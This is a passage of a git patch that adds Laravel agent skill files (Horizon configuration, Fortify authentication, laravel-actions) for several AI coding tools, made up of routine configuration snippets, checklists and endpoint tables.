From 3470f8b2a68a3b5a5342d2359e85770bba498f55 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 19:22:09 +0100
Subject: [PATCH 136/213] add new skills

---
 .agents/skills/configuring-horizon/SKILL.md   |  85 ++++
 .../configuring-horizon/references/metrics.md |  21 +
 .../references/notifications.md               |  21 +
 .../references/supervisors.md                 |  27 ++
 .../configuring-horizon/references/tags.md    |  21 +
 .agents/skills/fortify-development/SKILL.md   | 131 ++++++
 .agents/skills/laravel-actions/SKILL.md       | 302 +++++++++++++
 .../laravel-actions/references/command.md     | 160 +++++++
 .../laravel-actions/references/controller.md  | 339 ++++++++++++++
 .../skills/laravel-actions/references/job.md  | 425 ++++++++++++++++++
 .../laravel-actions/references/listener.md    |  81 ++++
 .../laravel-actions/references/object.md      | 118 +++++
 .../references/testing-fakes.md               | 160 +++++++
 .../references/troubleshooting.md             |  33 ++
 .../references/with-attributes.md             | 189 ++++++++
 .../skills/laravel-best-practices/SKILL.md    | 190 ++++++++
 .../rules/advanced-queries.md                 | 106 +++++
 .../rules/architecture.md                     | 202 +++++++++
 .../rules/blade-views.md                      |  36 ++
 .../laravel-best-practices/rules/caching.md   |  70 +++
 .../rules/collections.md                      |  44 ++
 .../laravel-best-practices/rules/config.md    |  73 +++
 .../rules/db-performance.md                   | 192 ++++++++
 .../laravel-best-practices/rules/eloquent.md  | 148 ++++++
 .../rules/error-handling.md                   |  72 +++
 .../rules/events-notifications.md             |  48 ++
 .../rules/http-client.md                      | 160 +++++++
 .../laravel-best-practices/rules/mail.md      |  27 ++
 .../rules/migrations.md                       | 121 +++++
 .../rules/queue-jobs.md                       | 146 ++++++
 .../laravel-best-practices/rules/routing.md   |  98 ++++
 .../rules/scheduling.md                       |  39 ++
 .../laravel-best-practices/rules/security.md  | 198 ++++++++
 .../laravel-best-practices/rules/style.md     | Bin 0 -> 4443 bytes
 .../laravel-best-practices/rules/testing.md   |  43 ++
 .../rules/validation.md                       |  75 ++++
 .agents/skills/socialite-development/SKILL.md |  80 ++++
 .claude/skills/configuring-horizon/SKILL.md   |  85 ++++
 .../configuring-horizon/references/metrics.md |  21 +
 .../references/notifications.md               |  21 +
 .../references/supervisors.md                 |  27 ++
 .../configuring-horizon/references/tags.md    |  21 +
 .claude/skills/fortify-development/SKILL.md   | 131 ++++++
 .claude/skills/laravel-actions/SKILL.md       | 302 +++++++++++++
 .../laravel-actions/references/command.md     | 160 +++++++
 .../laravel-actions/references/controller.md  | 339 ++++++++++++++
 .../skills/laravel-actions/references/job.md  | 425 ++++++++++++++++++
 .../laravel-actions/references/listener.md    |  81 ++++
 .../laravel-actions/references/object.md      | 118 +++++
 .../references/testing-fakes.md               | 160 +++++++
 .../references/troubleshooting.md             |  33 ++
 .../references/with-attributes.md             | 189 ++++++++
 .../skills/laravel-best-practices/SKILL.md    | 190 ++++++++
 .../rules/advanced-queries.md                 | 106 +++++
 .../rules/architecture.md                     | 202 +++++++++
 .../rules/blade-views.md                      |  36 ++
 .../laravel-best-practices/rules/caching.md   |  70 +++
 .../rules/collections.md                      |  44 ++
 .../laravel-best-practices/rules/config.md    |  73 +++
 .../rules/db-performance.md                   | 192 ++++++++
 .../laravel-best-practices/rules/eloquent.md  | 148 ++++++
 .../rules/error-handling.md                   |  72 +++
 .../rules/events-notifications.md             |  48 ++
 .../rules/http-client.md                      | 160 +++++++
 .../laravel-best-practices/rules/mail.md      |  27 ++
 .../rules/migrations.md                       | 121 +++++
 .../rules/queue-jobs.md                       | 146 ++++++
 .../laravel-best-practices/rules/routing.md   |  98 ++++
 .../rules/scheduling.md                       |  39 ++
 .../laravel-best-practices/rules/security.md  | 198 ++++++++
 .../laravel-best-practices/rules/style.md     | Bin 0 -> 4443 bytes
 .../laravel-best-practices/rules/testing.md   |  43 ++
 .../rules/validation.md                       |  75 ++++
 .claude/skills/socialite-development/SKILL.md |  80 ++++
 .cursor/skills/configuring-horizon/SKILL.md   |  85 ++++
 .../configuring-horizon/references/metrics.md |  21 +
 .../references/notifications.md               |  21 +
 .../references/supervisors.md                 |  27 ++
 .../configuring-horizon/references/tags.md    |  21 +
 .cursor/skills/fortify-development/SKILL.md   | 131 ++++++
 .cursor/skills/laravel-actions/SKILL.md       | 302 +++++++++++++
 .../laravel-actions/references/command.md     | 160 +++++++
 .../laravel-actions/references/controller.md  | 339 ++++++++++++++
 .../skills/laravel-actions/references/job.md  | 425 ++++++++++++++++++
 .../laravel-actions/references/listener.md    |  81 ++++
 .../laravel-actions/references/object.md      | 118 +++++
 .../references/testing-fakes.md               | 160 +++++++
 .../references/troubleshooting.md             |  33 ++
 .../references/with-attributes.md             | 189 ++++++++
 .../skills/laravel-best-practices/SKILL.md    | 190 ++++++++
 .../rules/advanced-queries.md                 | 106 +++++
 .../rules/architecture.md                     | 202 +++++++++
 .../rules/blade-views.md                      |  36 ++
 .../laravel-best-practices/rules/caching.md   |  70 +++
 .../rules/collections.md                      |  44 ++
 .../laravel-best-practices/rules/config.md    |  73 +++
 .../rules/db-performance.md                   | 192 ++++++++
 .../laravel-best-practices/rules/eloquent.md  | 148 ++++++
 .../rules/error-handling.md                   |  72 +++
 .../rules/events-notifications.md             |  48 ++
 .../rules/http-client.md                      | 160 +++++++
 .../laravel-best-practices/rules/mail.md      |  27 ++
 .../rules/migrations.md                       | 121 +++++
 .../rules/queue-jobs.md                       | 146 ++++++
 .../laravel-best-practices/rules/routing.md   |  98 ++++
 .../rules/scheduling.md                       |  39 ++
 .../laravel-best-practices/rules/security.md  | 198 ++++++++
 .../laravel-best-practices/rules/style.md     | Bin 0 -> 4443 bytes
 .../laravel-best-practices/rules/testing.md   |  43 ++
 .../rules/validation.md                       |  75 ++++
 .cursor/skills/socialite-development/SKILL.md |  80 ++++
 111 files changed, 12843 insertions(+)
 create mode 100644 .agents/skills/configuring-horizon/SKILL.md
 create mode 100644 .agents/skills/configuring-horizon/references/metrics.md
 create mode 100644 .agents/skills/configuring-horizon/references/notifications.md
 create mode 100644 .agents/skills/configuring-horizon/references/supervisors.md
 create mode 100644 .agents/skills/configuring-horizon/references/tags.md
 create mode 100644 .agents/skills/fortify-development/SKILL.md
 create mode 100644 .agents/skills/laravel-actions/SKILL.md
 create mode 100644 .agents/skills/laravel-actions/references/command.md
 create mode 100644 .agents/skills/laravel-actions/references/controller.md
 create mode 100644 .agents/skills/laravel-actions/references/job.md
 create mode 100644 .agents/skills/laravel-actions/references/listener.md
 create mode 100644 .agents/skills/laravel-actions/references/object.md
 create mode 100644 .agents/skills/laravel-actions/references/testing-fakes.md
 create mode 100644 .agents/skills/laravel-actions/references/troubleshooting.md
 create mode 100644 .agents/skills/laravel-actions/references/with-attributes.md
 create mode 100644 .agents/skills/laravel-best-practices/SKILL.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/advanced-queries.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/architecture.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/blade-views.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/caching.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/collections.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/config.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/db-performance.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/eloquent.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/error-handling.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/events-notifications.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/http-client.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/mail.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/migrations.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/queue-jobs.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/routing.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/scheduling.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/security.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/style.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/testing.md
 create mode 100644 .agents/skills/laravel-best-practices/rules/validation.md
 create mode 100644 .agents/skills/socialite-development/SKILL.md
 create mode 100644 .claude/skills/configuring-horizon/SKILL.md
 create mode 100644 .claude/skills/configuring-horizon/references/metrics.md
 create mode 100644 .claude/skills/configuring-horizon/references/notifications.md
 create mode 100644 .claude/skills/configuring-horizon/references/supervisors.md
 create mode 100644 .claude/skills/configuring-horizon/references/tags.md
 create mode 100644 .claude/skills/fortify-development/SKILL.md
 create mode 100644 .claude/skills/laravel-actions/SKILL.md
 create mode 100644 .claude/skills/laravel-actions/references/command.md
 create mode 100644 .claude/skills/laravel-actions/references/controller.md
 create mode 100644 .claude/skills/laravel-actions/references/job.md
 create mode 100644 .claude/skills/laravel-actions/references/listener.md
 create mode 100644 .claude/skills/laravel-actions/references/object.md
 create mode 100644 .claude/skills/laravel-actions/references/testing-fakes.md
 create mode 100644 .claude/skills/laravel-actions/references/troubleshooting.md
 create mode 100644 .claude/skills/laravel-actions/references/with-attributes.md
 create mode 100644 .claude/skills/laravel-best-practices/SKILL.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/advanced-queries.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/architecture.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/blade-views.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/caching.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/collections.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/config.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/db-performance.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/eloquent.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/error-handling.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/events-notifications.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/http-client.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/mail.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/migrations.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/queue-jobs.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/routing.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/scheduling.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/security.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/style.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/testing.md
 create mode 100644 .claude/skills/laravel-best-practices/rules/validation.md
 create mode 100644 .claude/skills/socialite-development/SKILL.md
 create mode 100644 .cursor/skills/configuring-horizon/SKILL.md
 create mode 100644 .cursor/skills/configuring-horizon/references/metrics.md
 create mode 100644 .cursor/skills/configuring-horizon/references/notifications.md
 create mode 100644 .cursor/skills/configuring-horizon/references/supervisors.md
 create mode 100644 .cursor/skills/configuring-horizon/references/tags.md
 create mode 100644 .cursor/skills/fortify-development/SKILL.md
 create mode 100644 .cursor/skills/laravel-actions/SKILL.md
 create mode 100644 .cursor/skills/laravel-actions/references/command.md
 create mode 100644 .cursor/skills/laravel-actions/references/controller.md
 create mode 100644 .cursor/skills/laravel-actions/references/job.md
 create mode 100644 .cursor/skills/laravel-actions/references/listener.md
 create mode 100644 .cursor/skills/laravel-actions/references/object.md
 create mode 100644 .cursor/skills/laravel-actions/references/testing-fakes.md
 create mode 100644 .cursor/skills/laravel-actions/references/troubleshooting.md
 create mode 100644 .cursor/skills/laravel-actions/references/with-attributes.md
 create mode 100644 .cursor/skills/laravel-best-practices/SKILL.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/advanced-queries.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/architecture.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/blade-views.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/caching.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/collections.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/config.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/db-performance.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/eloquent.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/error-handling.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/events-notifications.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/http-client.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/mail.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/migrations.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/queue-jobs.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/routing.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/scheduling.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/security.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/style.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/testing.md
 create mode 100644 .cursor/skills/laravel-best-practices/rules/validation.md
 create mode 100644 .cursor/skills/socialite-development/SKILL.md

diff --git a/.agents/skills/configuring-horizon/SKILL.md b/.agents/skills/configuring-horizon/SKILL.md
new file mode 100644
index 000000000..bed1e74c0
--- /dev/null
+++ b/.agents/skills/configuring-horizon/SKILL.md
@@ -0,0 +1,85 @@
+---
+name: configuring-horizon
+description: "Use this skill whenever the user mentions Horizon by name in a Laravel context. Covers the full Horizon lifecycle: installing Horizon (horizon:install, Sail setup), configuring config/horizon.php (supervisor blocks, queue assignments, balancing strategies, minProcesses/maxProcesses), fixing the dashboard (authorization via Gate::define viewHorizon, blank metrics, horizon:snapshot scheduling), and troubleshooting production issues (worker crashes, timeout chain ordering, LongWaitDetected notifications, waits config). Also covers job tagging and silencing. Do not use for generic Laravel queues without Horizon, SQS or database drivers, standalone Redis setup, Linux supervisord, Telescope, or job batching."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Horizon Configuration
+
+## Documentation
+
+Use `search-docs` for detailed Horizon patterns and documentation covering configuration, supervisors, balancing, dashboard authorization, tags, notifications, metrics, and deployment.
+
+For deeper guidance on specific topics, read the relevant reference file before implementing:
+
+- `references/supervisors.md` covers supervisor blocks, balancing strategies, multi-queue setups, and auto-scaling
+- `references/notifications.md` covers LongWaitDetected alerts, notification routing, and the `waits` config
+- `references/tags.md` covers job tagging, dashboard filtering, and silencing noisy jobs
+- `references/metrics.md` covers the blank metrics dashboard, snapshot scheduling, and retention config
+
+## Basic Usage
+
+### Installation
+
+```bash
+php artisan horizon:install
+```
+
+### Supervisor Configuration
+
+Define supervisors in `config/horizon.php`. The `environments` array merges into `defaults` and does not replace the whole supervisor block:
+
+<!-- Supervisor Config -->
+```php
+'defaults' => [
+    'supervisor-1' => [
+        'connection' => 'redis',
+        'queue' => ['default'],
+        'balance' => 'auto',
+        'minProcesses' => 1,
+        'maxProcesses' => 10,
+        'tries' => 3,
+    ],
+],
+
+'environments' => [
+    'production' => [
+        'supervisor-1' => ['maxProcesses' => 20, 'balanceCooldown' => 3],
+    ],
+    'local' => [
+        'supervisor-1' => ['maxProcesses' => 2],
+    ],
+],
+```
+
+### Dashboard Authorization
+
+Restrict access in `App\Providers\HorizonServiceProvider`:
+
+<!-- Dashboard Gate -->
+```php
+protected function gate(): void
+{
+    Gate::define('viewHorizon', function (User $user) {
+        return $user->is_admin;
+    });
+}
+```
+
+## Verification
+
+1. Run `php artisan horizon` and visit `/horizon`
+2. Confirm dashboard access is restricted as expected
+3. Check that metrics populate after scheduling `horizon:snapshot`
+
+## Common Pitfalls
+
+- Horizon only works with the Redis queue driver. Other drivers such as database and SQS are not supported.
+- Redis Cluster is not supported. Horizon requires a standalone Redis connection.
+- Always check `config/horizon.php` before making changes to understand the current supervisor and environment configuration.
+- The `environments` array overrides only the keys you specify. It merges into `defaults` and does not replace it.
+- The timeout chain must be ordered: job `timeout` less than supervisor `timeout` less than `retry_after`. The wrong order can cause jobs to be retried before Horizon finishes timing them out.
+- The metrics dashboard stays blank until `horizon:snapshot` is scheduled. Running `php artisan horizon` alone does not populate metrics.
+- Always use `search-docs` for the latest Horizon documentation rather than relying on this skill alone.
\ No newline at end of file
diff --git a/.agents/skills/configuring-horizon/references/metrics.md b/.agents/skills/configuring-horizon/references/metrics.md
new file mode 100644
index 000000000..312f79ee7
--- /dev/null
+++ b/.agents/skills/configuring-horizon/references/metrics.md
@@ -0,0 +1,21 @@
+# Metrics & Snapshots
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon metrics snapshot"` for the snapshot command and scheduling
+- `"horizon trim snapshots"` for retention configuration
+
+## What to Watch For
+
+### Metrics dashboard stays blank until `horizon:snapshot` is scheduled
+
+Running `horizon` artisan command does not populate metrics automatically. The metrics graph is built from snapshots, so `horizon:snapshot` must be scheduled to run every 5 minutes via Laravel's scheduler.
+
+### Register the snapshot in the scheduler rather than running it manually
+
+A single manual run populates the dashboard momentarily but will not keep it updated. Search `"horizon metrics snapshot"` for the exact scheduler registration syntax, which differs between Laravel 10 and 11+.
+
+### `metrics.trim_snapshots` is a snapshot count, not a time duration
+
+The `trim_snapshots.job` and `trim_snapshots.queue` values in `config/horizon.php` are counts of snapshots to keep, not minutes or hours. With the default of 24 snapshots at 5-minute intervals, that provides 2 hours of history. Increase the value to retain more history at the cost of Redis memory usage.
\ No newline at end of file
diff --git a/.agents/skills/configuring-horizon/references/notifications.md b/.agents/skills/configuring-horizon/references/notifications.md
new file mode 100644
index 000000000..943d1a26a
--- /dev/null
+++ b/.agents/skills/configuring-horizon/references/notifications.md
@@ -0,0 +1,21 @@
+# Notifications & Alerts
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon notifications"` for Horizon's built-in notification routing helpers
+- `"horizon long wait detected"` for LongWaitDetected event details
+
+## What to Watch For
+
+### `waits` in `config/horizon.php` controls the LongWaitDetected threshold
+
+The `waits` array (e.g., `'redis:default' => 60`) defines how many seconds a job can wait in a queue before Horizon fires a `LongWaitDetected` event. This value is set in the config file, not in Horizon's notification routing. If alerts are firing too often or too late, adjust `waits` rather than the routing configuration.
+
+### Use Horizon's built-in notification routing in `HorizonServiceProvider`
+
+Configure notifications in the `boot()` method of `App\Providers\HorizonServiceProvider` using `Horizon::routeMailNotificationsTo()`, `Horizon::routeSlackNotificationsTo()`, or `Horizon::routeSmsNotificationsTo()`. Horizon already wires `LongWaitDetected` to its notification sender, so the documented setup is notification routing rather than manual listener registration.
+
+### Failed job alerts are separate from Horizon's documented notification routing
+
+Horizon's 12.x documentation covers built-in long-wait notifications. Do not assume the docs provide a `JobFailed` listener example in `HorizonServiceProvider`. If a user needs failed job alerts, treat that as custom queue event handling and consult the queue documentation instead of Horizon's notification-routing API.
\ No newline at end of file
diff --git a/.agents/skills/configuring-horizon/references/supervisors.md b/.agents/skills/configuring-horizon/references/supervisors.md
new file mode 100644
index 000000000..9da0c1769
--- /dev/null
+++ b/.agents/skills/configuring-horizon/references/supervisors.md
@@ -0,0 +1,27 @@
+# Supervisor & Balancing Configuration
+
+## Where to Find It
+
+Search with `search-docs` before writing any supervisor config, as option names and defaults change between Horizon versions:
+- `"horizon supervisor configuration"` for the full options list
+- `"horizon balancing strategies"` for auto, simple, and false modes
+- `"horizon autoscaling workers"` for autoScalingStrategy details
+- `"horizon environment configuration"` for the defaults and environments merge
+
+## What to Watch For
+
+### The `environments` array merges into `defaults` rather than replacing it
+
+The `defaults` array defines the complete base supervisor config. The `environments` array patches it per environment, overriding only the keys listed. There is no need to repeat every key in each environment block. A common pattern is to define `connection`, `queue`, `balance`, `autoScalingStrategy`, `tries`, and `timeout` in `defaults`, then override only `maxProcesses`, `balanceMaxShift`, and `balanceCooldown` in `production`.
+
+### Use separate named supervisors to enforce queue priority
+
+Horizon does not enforce queue order when using `balance: auto` on a single supervisor. The `queue` array order is ignored for load balancing. To process `notifications` before `default`, use two separately named supervisors: one for the high-priority queue with a higher `maxProcesses`, and one for the low-priority queue with a lower cap. The docs include an explicit note about this.
+
+### Use `balance: false` to keep a fixed number of workers on a dedicated queue
+
+Auto-balancing suits variable load, but if a queue should always have exactly N workers such as a video-processing queue limited to 2, set `balance: false` and `maxProcesses: 2`. Auto-balancing would scale it up during bursts, which may be undesirable.
+
+### Set `balanceCooldown` to prevent rapid worker scaling under bursty load
+
+When using `balance: auto`, the supervisor can scale up and down rapidly under bursty load. Set `balanceCooldown` to the number of seconds between scaling decisions, typically 3 to 5, to smooth this out. `balanceMaxShift` limits how many processes are added or removed per cycle.
\ No newline at end of file
diff --git a/.agents/skills/configuring-horizon/references/tags.md b/.agents/skills/configuring-horizon/references/tags.md
new file mode 100644
index 000000000..263c955c1
--- /dev/null
+++ b/.agents/skills/configuring-horizon/references/tags.md
@@ -0,0 +1,21 @@
+# Tags & Silencing
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon tags"` for the tagging API and auto-tagging behaviour
+- `"horizon silenced jobs"` for the `silenced` and `silenced_tags` config options
+
+## What to Watch For
+
+### Eloquent model jobs are tagged automatically without any extra code
+
+If a job's constructor accepts Eloquent model instances, Horizon automatically tags the job with `ModelClass:id` such as `App\Models\User:42`. These tags are filterable in the dashboard without any changes to the job class. Only add a `tags()` method when custom tags beyond auto-tagging are needed.
+
+### `silenced` hides jobs from the dashboard completed list but does not stop them from running
+
+Adding a job class to the `silenced` array in `config/horizon.php` removes it from the completed jobs view. The job still runs normally. This is a dashboard noise-reduction tool, not a way to disable jobs.
+
+### `silenced_tags` hides all jobs carrying a matching tag from the completed list
+
+Any job carrying a matching tag string is hidden from the completed jobs view. This is useful for silencing a category of jobs such as all jobs tagged `notifications`, rather than silencing specific classes.
\ No newline at end of file
diff --git a/.agents/skills/fortify-development/SKILL.md b/.agents/skills/fortify-development/SKILL.md
new file mode 100644
index 000000000..86322d9c0
--- /dev/null
+++ b/.agents/skills/fortify-development/SKILL.md
@@ -0,0 +1,131 @@
+---
+name: fortify-development
+description: 'ACTIVATE when the user works on authentication in Laravel. This includes login, registration, password reset, email verification, two-factor authentication (2FA/TOTP/QR codes/recovery codes), profile updates, password confirmation, or any auth-related routes and controllers. Activate when the user mentions Fortify, auth, authentication, login, register, signup, forgot password, verify email, 2FA, or references app/Actions/Fortify/, CreateNewUser, UpdateUserProfileInformation, FortifyServiceProvider, config/fortify.php, or auth guards. Fortify is the frontend-agnostic authentication backend for Laravel that registers all auth routes and controllers. Also activate when building SPA or headless authentication, customizing login redirects, overriding response contracts like LoginResponse, or configuring login throttling. Do NOT activate for Laravel Passport (OAuth2 API tokens), Socialite (OAuth social login), or non-auth Laravel features.'
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Laravel Fortify Development
+
+Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
+
+## Documentation
+
+Use `search-docs` for detailed Laravel Fortify patterns and documentation.
+
+## Usage
+
+- **Routes**: Use `list-routes` with `only_vendor: true` and `action: "Fortify"` to see all registered endpoints
+- **Actions**: Check `app/Actions/Fortify/` for customizable business logic (user creation, password validation, etc.)
+- **Config**: See `config/fortify.php` for all options including features, guards, rate limiters, and username field
+- **Contracts**: Look in `Laravel\Fortify\Contracts\` for overridable response classes (`LoginResponse`, `LogoutResponse`, etc.)
+- **Views**: All view callbacks are set in `FortifyServiceProvider::boot()` using `Fortify::loginView()`, `Fortify::registerView()`, etc.
+
+## Available Features
+
+Enable in `config/fortify.php` features array:
+
+- `Features::registration()` - User registration
+- `Features::resetPasswords()` - Password reset via email
+- `Features::emailVerification()` - Requires User to implement `MustVerifyEmail`
+- `Features::updateProfileInformation()` - Profile updates
+- `Features::updatePasswords()` - Password changes
+- `Features::twoFactorAuthentication()` - 2FA with QR codes and recovery codes
+
+> Use `search-docs` for feature configuration options and customization patterns.
+
+## Setup Workflows
+
+### Two-Factor Authentication Setup
+
+```
+- [ ] Add TwoFactorAuthenticatable trait to User model
+- [ ] Enable feature in config/fortify.php
+- [ ] If the `*_add_two_factor_columns_to_users_table.php` migration is missing, publish via `php artisan vendor:publish --tag=fortify-migrations` and migrate
+- [ ] Set up view callbacks in FortifyServiceProvider
+- [ ] Create 2FA management UI
+- [ ] Test QR code and recovery codes
+```
+
+> Use `search-docs` for TOTP implementation and recovery code handling patterns.
+
+### Email Verification Setup
+
+```
+- [ ] Enable emailVerification feature in config
+- [ ] Implement MustVerifyEmail interface on User model
+- [ ] Set up verifyEmailView callback
+- [ ] Add verified middleware to protected routes
+- [ ] Test verification email flow
+```
+
+> Use `search-docs` for MustVerifyEmail implementation patterns.
+
+### Password Reset Setup
+
+```
+- [ ] Enable resetPasswords feature in config
+- [ ] Set up requestPasswordResetLinkView callback
+- [ ] Set up resetPasswordView callback
+- [ ] Define password.reset named route (if views disabled)
+- [ ] Test reset email and link flow
+```
+
+> Use `search-docs` for custom password reset flow patterns.
+
+### SPA Authentication Setup
+
+```
+- [ ] Set 'views' => false in config/fortify.php
+- [ ] Install and configure Laravel Sanctum for session-based SPA authentication
+- [ ] Use the 'web' guard in config/fortify.php (required for session-based authentication)
+- [ ] Set up CSRF token handling
+- [ ] Test XHR authentication flows
+```
+
+> Use `search-docs` for integration and SPA authentication patterns.
+
+#### Two-Factor Authentication in SPA Mode
+
+When `views` is set to `false`, Fortify returns JSON responses instead of redirects.
+
+If a user attempts to log in and two-factor authentication is enabled, the login request will return a JSON response indicating that a two-factor challenge is required:
+
+```json
+{
+    "two_factor": true
+}
+```
+
+## Best Practices
+
+### Custom Authentication Logic
+
+Override authentication behavior using `Fortify::authenticateUsing()` for custom user retrieval or `Fortify::authenticateThrough()` to customize the authentication pipeline. Override response contracts in `AppServiceProvider` for custom redirects.
+
+### Registration Customization
+
+Modify `app/Actions/Fortify/CreateNewUser.php` to customize user creation logic, validation rules, and additional fields.
+
+### Rate Limiting
+
+Configure via `fortify.limiters.login` in config. Default configuration throttles by username + IP combination.
+
+## Key Endpoints
+
+| Feature                | Method   | Endpoint                                    |
+|------------------------|----------|---------------------------------------------|
+| Login                  | POST     | `/login`                                    |
+| Logout                 | POST     | `/logout`                                   |
+| Register               | POST     | `/register`                                 |
+| Password Reset Request | POST     | `/forgot-password`                          |
+| Password Reset         | POST     | `/reset-password`                           |
+| Email Verify Notice    | GET      | `/email/verify`                             |
+| Resend Verification    | POST     | `/email/verification-notification`          |
+| Password Confirm       | POST     | `/user/confirm-password`                    |
+| Enable 2FA             | POST     | `/user/two-factor-authentication`           |
+| Confirm 2FA            | POST     | `/user/confirmed-two-factor-authentication` |
+| 2FA Challenge          | POST     | `/two-factor-challenge`                     |
+| Get QR Code            | GET      | `/user/two-factor-qr-code`                  |
+| Recovery Codes         | GET/POST | `/user/two-factor-recovery-codes`           |
\ No newline at end of file
diff --git a/.agents/skills/laravel-actions/SKILL.md b/.agents/skills/laravel-actions/SKILL.md
new file mode 100644
index 000000000..862dd55b5
--- /dev/null
+++ b/.agents/skills/laravel-actions/SKILL.md
@@ -0,0 +1,302 @@
+---
+name: laravel-actions
+description: Build, refactor, and troubleshoot Laravel Actions using lorisleiva/laravel-actions. Use when implementing reusable action classes (object/controller/job/listener/command), converting service classes/controllers/jobs into actions, orchestrating workflows via faked actions, or debugging action entrypoints and wiring.
+---
+
+# Laravel Actions or `lorisleiva/laravel-actions`
+
+## Overview
+
+Use this skill to implement or update actions based on `lorisleiva/laravel-actions` with consistent structure and predictable testing patterns.
+
+## Quick Workflow
+
+1. Confirm the package is installed with `composer show lorisleiva/laravel-actions`.
+2. Create or edit an action class that uses `Lorisleiva\Actions\Concerns\AsAction`.
+3. Implement `handle(...)` with the core business logic first.
+4. Add adapter methods only when needed for the requested entrypoint:
+   - `asController` (+ route/invokable controller usage)
+   - `asJob` (+ dispatch)
+   - `asListener` (+ event listener wiring)
+   - `asCommand` (+ command signature/description)
+5. Add or update tests for the chosen entrypoint.
+6. When tests need isolation, use action fakes (`MyAction::fake()`) and assertions (`MyAction::assertDispatched()`).
+
+## Base Action Pattern
+
+Use this minimal skeleton and expand only what is needed.
+
+```php
+<?php
+
+namespace App\Actions;
+
+use Lorisleiva\Actions\Concerns\AsAction;
+
+class PublishArticle
+{
+    use AsAction;
+
+    public function handle(int $articleId): bool
+    {
+        return true;
+    }
+}
+```
+
+## Project Conventions
+
+- Place action classes in `App\Actions` unless an existing domain sub-namespace is already used.
+- Use descriptive `VerbNoun` naming (e.g. `PublishArticle`, `SyncVehicleTaxStatus`).
+- Keep domain/business logic in `handle(...)`; keep transport and framework concerns in adapter methods (`asController`, `asJob`, `asListener`, `asCommand`).
+- Prefer explicit parameter and return types in all action methods.
+- Prefer PHPDoc for complex data contracts (e.g. array shapes), not inline comments.
+
+### When to Use an Action
+
+- Use an Action when the same use-case needs multiple entrypoints (HTTP, queue, event, CLI) or benefits from first-class orchestration/faking.
+- Keep a plain service class when logic is local, single-entrypoint, and unlikely to be reused as an Action.
+
+## Entrypoint Patterns
+
+### Run as Object
+
+- (prefer method) Use static helper from the trait: `PublishArticle::run($id)`.
+- Use make and call handle: `PublishArticle::make()->handle($id)`.
+- Call with dependency injection: `app(PublishArticle::class)->handle($id)`.
+
+### Run as Controller
+
+- Use route to class (invokable style), e.g. `Route::post('/articles/{id}/publish', PublishArticle::class)`.
+- Add `asController(...)` for HTTP-specific adaptation and return a response.
+- Add request validation (`rules()` or custom validator hooks) when input comes from HTTP.
+
+### Run as Job
+
+- Dispatch with `PublishArticle::dispatch($id)`.
+- Use `asJob(...)` only for queue-specific behavior; keep domain logic in `handle(...)`.
+- In this project, job Actions often define additional queue lifecycle methods and job properties for retries, uniqueness, and timing control.
+
+#### Project Pattern: Job Action with Extra Methods
+
+```php
+<?php
+
+namespace App\Actions\Demo;
+
+use App\Models\Demo;
+use DateTime;
+use Lorisleiva\Actions\Concerns\AsAction;
+use Lorisleiva\Actions\Decorators\JobDecorator;
+
+class GetDemoData
+{
+    use AsAction;
+
+    public int $jobTries = 3;
